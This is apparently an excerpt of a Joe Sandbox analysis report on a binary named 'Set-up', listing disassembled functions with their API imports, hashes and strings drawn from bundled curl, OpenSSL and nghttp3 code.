                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$feoffgetsmemcmpmemcpy
                                      • String ID: %256s "%64[^"]"$hsts.c$unlimited
                                      • API String ID: 288886899-2895786126
                                      • Opcode ID: 1e7b72e3e86f8ee70521cef731fde2bf55ddfe0d03342e0b3f0974fd887fe622
                                      • Instruction ID: 8e063b9563e17f89921324758c7e08eb21980bc33422455f85ea4ad4183a3e80
                                      • Opcode Fuzzy Hash: 1e7b72e3e86f8ee70521cef731fde2bf55ddfe0d03342e0b3f0974fd887fe622
                                      • Instruction Fuzzy Hash: 89511771D443027FFB109B349C46EAB7EE8BF85705F140828FD49A6282F631DA85C693
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00709265,?,00000400,00000000,?), ref: 00708254
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00709265,?), ref: 00708264
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00709265,?,?,?,?,?,?,00709265,?,00000400,00000000,?), ref: 007082C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpymemsetstrlen
                                      • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                                      • API String ID: 160209724-3271887637
                                      • Opcode ID: 1f4d524bea342dc0ae600a8df5a1ccfab7c9cc9651812a963210df38bd02cfb7
                                      • Instruction ID: 2860c4de277cfa097978f4aebf63910d2221c61b2c4ec2796bc32863523707d6
                                      • Opcode Fuzzy Hash: 1f4d524bea342dc0ae600a8df5a1ccfab7c9cc9651812a963210df38bd02cfb7
                                      • Instruction Fuzzy Hash: 4101D2A6B043116BE95076686C82F6B26DDDB86B64F080139FE04E21C2EA51DD1592F3
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005B895D
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B8991
                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B899A
                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005B89AB
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005B89B4
                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 005B89B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
                                      • String ID:
                                      • API String ID: 1064163434-0
                                      • Opcode ID: 3b5f34a48585cbd5cfba50210aacbff5512f22dec81244edfce1ab1b497462df
                                      • Instruction ID: 0b9abbc618e52b2988de5b96cdbb30e862a7e7f9a5e9c2dd2b3c3f4124b179bd
                                      • Opcode Fuzzy Hash: 3b5f34a48585cbd5cfba50210aacbff5512f22dec81244edfce1ab1b497462df
                                      • Instruction Fuzzy Hash: 2D119EB44093119BD740AF2A858862EFBE8BF89740F45981EF9C883341EB749940CF93
                                      APIs
                                      • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00898928
                                      • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089893D
                                      • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 00898942
                                      • __p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089894F
                                      • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 0089895C
                                      • _set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0051115A), ref: 00898972
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
                                      • String ID:
                                      • API String ID: 3593706420-0
                                      • Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                      • Instruction ID: 1c07dccd3461122d172363cff379a905af91d6e3e5b01caefb0043d7ee675a41
                                      • Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                      • Instruction Fuzzy Hash: 05F09274614742CFCB00BF6CC48181A77E0FF9A318F544AA8F5909B362DA3599419F92
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00545B6B,00000017,?,?), ref: 00574612
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00574660
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errnomemchr
                                      • String ID: 0123456789ABCDEF$0123456789abcdef
                                      • API String ID: 4119152314-885041942
                                      • Opcode ID: f2dc61189bd3ec66502167010313709baa35282eb22b0dcd80f54321cfd5b032
                                      • Instruction ID: 33cb1b3f4ef8ae10d313d00efae40fe50dd5e96d06757dc06ab1c214914f5d50
                                      • Opcode Fuzzy Hash: f2dc61189bd3ec66502167010313709baa35282eb22b0dcd80f54321cfd5b032
                                      • Instruction Fuzzy Hash: D9910271A083458BD728DE2CE84026EBBD1FFD6314F19CA2DE9D987381DB319845AF42
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0056225F
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005622CF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64strlen
                                      • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                                      • API String ID: 3014104814-1335658360
                                      • Opcode ID: ae60dd3299af95159653b22dba877007d40f60474d81cd62966d22bbb09daf4a
                                      • Instruction ID: 0faf9bf3ad031e0e5f763265c663dcec2dd88a922b5bae4b7d8431b940915cf9
                                      • Opcode Fuzzy Hash: ae60dd3299af95159653b22dba877007d40f60474d81cd62966d22bbb09daf4a
                                      • Instruction Fuzzy Hash: 4341F371A00B055BDB249A29DC85B7BBAD5FFC4314F08483CE99A8B382EA35AC55C751
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,005C0307,?), ref: 005C07AE
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005C07C3
                                      Strings
                                      • ctx->next_absidx > absidx, xrefs: 005C07A9
                                      • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 005C07BE
                                      • nghttp3_qpack.c, xrefs: 005C07A4, 005C07B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                                      • API String ID: 1222420520-241347991
                                      • Opcode ID: d763f4b45aa48498248d0dc1e368b1e40f1aedf6cecaa0514b7144d46c68a54c
                                      • Instruction ID: da1f303b82857f3b29401422dcc76e6882ed66c237192323dd9e998e1c9999c7
                                      • Opcode Fuzzy Hash: d763f4b45aa48498248d0dc1e368b1e40f1aedf6cecaa0514b7144d46c68a54c
                                      • Instruction Fuzzy Hash: 6D31E079700600AFD310AA68DC85F6BB7E5FF89714F04956CF98A87282EA20F85587E1
                                      APIs
                                      • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00525FB6,?), ref: 00894645
                                      • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00894698
                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BFE1F8), ref: 00894744
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00894762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _stat64$fclosefopen
                                      • String ID: ../list/public_suffix_list.dat
                                      • API String ID: 1085753941-141370353
                                      • Opcode ID: 17ef1e8c419a736eb131e7868ca05d67995181f40c512137d06a12d713af3db0
                                      • Instruction ID: f8cb576aa6dad48bca79f27c47d2bdc6bf6ed0d0111e47ea8e95c252df698680
                                      • Opcode Fuzzy Hash: 17ef1e8c419a736eb131e7868ca05d67995181f40c512137d06a12d713af3db0
                                      • Instruction Fuzzy Hash: 1E4190B29083499BDB00EF58D440B1AB7E9FB85744F19582CE985D7350E770ED49CB93
                                      APIs
                                      • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00582771
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _time64
                                      • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                      • API String ID: 1670930206-2395985473
                                      • Opcode ID: 72983ed8ae44c5c001454dcb99624230ab691b66d4c0735714e4bd805b6006ad
                                      • Instruction ID: 0d12ae6947c8b00d0fbce76778fc596ec03c06ee31b89dde48274440080f37c6
                                      • Opcode Fuzzy Hash: 72983ed8ae44c5c001454dcb99624230ab691b66d4c0735714e4bd805b6006ad
                                      • Instruction Fuzzy Hash: 0321ECB17003005BEB286A2A9C06B277DDAFBC4304F18853DF949DB2D6F975D8118751
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 005B6119
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 005B612E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                                      • API String ID: 1222420520-3888743547
                                      • Opcode ID: 8b616473fea15bb7f2d5976691e313ebf4f9dbea29e224676c2ff48d0584bfcc
                                      • Instruction ID: 238185cbfb585a4584e84cd0bf4348d05b6e8ecdf813ec56852081bb200a93a5
                                      • Opcode Fuzzy Hash: 8b616473fea15bb7f2d5976691e313ebf4f9dbea29e224676c2ff48d0584bfcc
                                      • Instruction Fuzzy Hash: 3431F9755043058FC704EF19D88AABABBE4FF88318F0545BCE9895B351D671BD41CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: application/octet-stream$formdata.c
                                      • API String ID: 0-1216067158
                                      • Opcode ID: 0b900434b23142c444414c87ea5848a79cc8f7a1bb26bddab997b566ee6cf453
                                      • Instruction ID: 3c07bdcd632b75d03b19d33d2bc1de791d991f6057a914d692775ab2e17ef778
                                      • Opcode Fuzzy Hash: 0b900434b23142c444414c87ea5848a79cc8f7a1bb26bddab997b566ee6cf453
                                      • Instruction Fuzzy Hash: 8302A3B0A08B40DBF7259F14D9447A6BFE1BB95304F18582CD8CA4B792E775E8C5CB82
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 007B46DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                                      • API String ID: 39653677-2338284442
                                      • Opcode ID: 028d56b4444559c7744ed826bec3a34a07556b21a835c70bd903c8188da8fe07
                                      • Instruction ID: cfa3bce9f8fb10f384babdcdf387021d394b8e582ca921bb60c1a3af521d2881
                                      • Opcode Fuzzy Hash: 028d56b4444559c7744ed826bec3a34a07556b21a835c70bd903c8188da8fe07
